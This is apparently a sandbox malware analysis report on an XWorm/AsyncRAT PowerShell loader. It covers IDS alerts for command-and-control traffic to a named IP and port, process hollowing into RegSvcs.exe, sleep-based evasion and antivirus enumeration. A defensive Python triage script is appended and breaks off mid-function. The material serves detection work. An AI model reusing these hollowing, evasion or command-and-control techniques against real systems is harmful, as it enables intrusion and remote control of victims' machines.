Source: 0.2.powershell.exe.272c9328660.2.raw.unpack | String decryptor: <Xwormmm>
Source: 0.2.powershell.exe.272c9328660.2.raw.unpack | String decryptor: XWorm
Source: 0.2.powershell.exe.272c9328660.2.raw.unpack | String decryptor: USB.exe
Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2207246498.00000272E0650000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

            Networking

Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.170:4413 -> 192.168.2.6:49718
Source: Network traffic | Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 176.113.115.170:4413 -> 192.168.2.6:49718
Source: Network traffic | Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49718 -> 176.113.115.170:4413
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49718 -> 176.113.115.170:4413
Source: Network traffic | Suricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49718 -> 176.113.115.170:4413
Source: Malware configuration extractor | URLs: 176.113.115.170
Source: global traffic | TCP traffic: 192.168.2.6:49718 -> 176.113.115.170:4413
Source: global traffic | TCP traffic: 192.168.2.6:57846 -> 162.159.36.2:53
Source: Joe Sandbox View | ASN Name: SELECTELRU SELECTELRU
Source: unknown | DNS traffic detected: query: 18.31.95.13.in-addr.arpa, reply code: Name error (3)
Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.170 (46 entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 entries)
Source: global traffic | DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: powershell.exe, 00000000.00000002.2176808391.00000272C94E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2176808391.00000272C8111000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2176808391.00000272C8111000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2176808391.00000272C94E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

            System Summary

            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348940FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34895190
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3489A5D9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3489D5CF
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348979C4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34893E65
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3489D65D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34893BFB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0127B178
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01276340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012784B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01275A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0127BEB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01275728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01270FA0
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: classification engine | Classification label: mal100.troj.evad.winPS1@4/5@1/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\aaFTu0nm8LZLCn72
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2616:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wef4roxy.0ja.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: 176.113.115.170.ps1 | Virustotal: Detection: 9%
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdatauser.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2207246498.00000272E0650000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348909CA push E85D605Dh; ret 0_2_00007FFD348909F9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3489540F push ds; retf 0_2_00007FFD34895411
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34894C00 push E8FFFFFFh; iretd 0_2_00007FFD34894C0D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3489D7CD push E8000020h; ret 0_2_00007FFD3489D7F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01278080 push eax; iretd 4_2_01278081
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01274CC8 pushad ; retf 4_2_01274CD1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4160
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7204
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5344 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6512 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: RegSvcs.exe, 00000004.00000002.4599997766.000000000107C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B54008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: RegSvcs.exe, 00000004.00000002.4599997766.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4599997766.000000000106E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
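The evasion and injection rows above encode three behaviours worth turning into checks: powershell.exe writes a buffer beginning 4D5A (an MZ header) at base 400000 inside a RegSvcs.exe it spawned itself, which is the process-hollowing pattern; both processes sleep for 922337203685477 ms, which is exactly Int64.MaxValue 100-ns ticks expressed in milliseconds (a TimeSpan.MaxValue-sized stall); and RegSvcs.exe runs WMI queries against Win32_VideoController and SecurityCenter2 AntivirusProduct. The script below is an added example, not Joe Sandbox code and not code from the sample: it encodes those three observations as rules and runs them over constructed event lines shaped like the report's rows. The "process | kind: detail" row layout, the rule names, the recon-class mapping and the 3-minute stall threshold are this example's own assumptions.

```python
"""Triage rules over Joe Sandbox-style behaviour rows (added example, not
part of the report; row layout, rule names and threshold are assumptions)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Int64.MaxValue 100-ns ticks expressed in milliseconds. A .NET sleep of
# TimeSpan.MaxValue shows up in the report as exactly this value.
TIMESPAN_MAX_MS = (2 ** 63 - 1) // 10_000      # 922337203685477
STALL_THRESHOLD_MS = 3 * 60 * 1000             # assumed: >= 3 min counts as stalling

# WMI classes queried by the implant and the recon purpose of each (assumed mapping).
RECON_WMI_CLASSES = {
    "Win32_VideoController": "GPU/VM fingerprinting",
    "AntivirusProduct": "installed AV enumeration via SecurityCenter2",
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# Constructed sample rows: shape copied from the report, values typed by hand.
SAMPLE_EVENTS = [
    f"{PS} | Memory written: {REGSVCS} base: 400000 value starts with: 4D5A",
    f"{PS} | Memory written: {REGSVCS} base: 402000",
    f'{PS} | Process created: {REGSVCS} "{REGSVCS}"',
    f"{REGSVCS} | WMI Queries: IWbemServices::ExecQuery - root\\cimv2 : SELECT * FROM Win32_VideoController",
    f"{REGSVCS} | WMI Queries: IWbemServices::ExecQuery - root\\SecurityCenter2 : Select * from AntivirusProduct",
    f"{REGSVCS} | Thread delayed: delay time: {TIMESPAN_MAX_MS}",
    f"{PS} | Thread delayed: delay time: 1000",
]


@dataclass
class Finding:
    rule: str
    process: str
    detail: str


_ROW = re.compile(r"^(?P<src>.+?) \| (?P<kind>[^:]+): (?P<rest>.*)$")
_MEMWRITE = re.compile(
    r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)"
    r"(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$"
)
_WMI_CLASS = re.compile(r"\bFROM\s+(?P<cls>\w+)", re.IGNORECASE)
_DELAY_MS = re.compile(r"delay time: (?P<ms>\d+)")


def parse_rows(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Split each row into (source process, observation kind, detail); skip junk."""
    rows = []
    for line in lines:
        m = _ROW.match(line.strip())
        if m:
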